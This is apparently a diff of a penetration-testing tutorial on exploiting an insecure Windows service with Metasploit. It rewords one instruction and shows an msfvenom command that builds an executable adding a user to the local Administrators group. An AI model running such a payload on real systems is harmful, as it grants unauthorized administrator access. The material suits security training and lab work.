Exploiting Insecure Service with Metasploit¶

 -

-let’s create a binary to Add a User to the Administrators with msfvenom.
+Create a binary to add a user to the Administrators group with msfvenom

 msfvenom -p windows/x64/exec CMD='net localgroup Administrators [USERNAME] /add' -f exe > hackfast.exe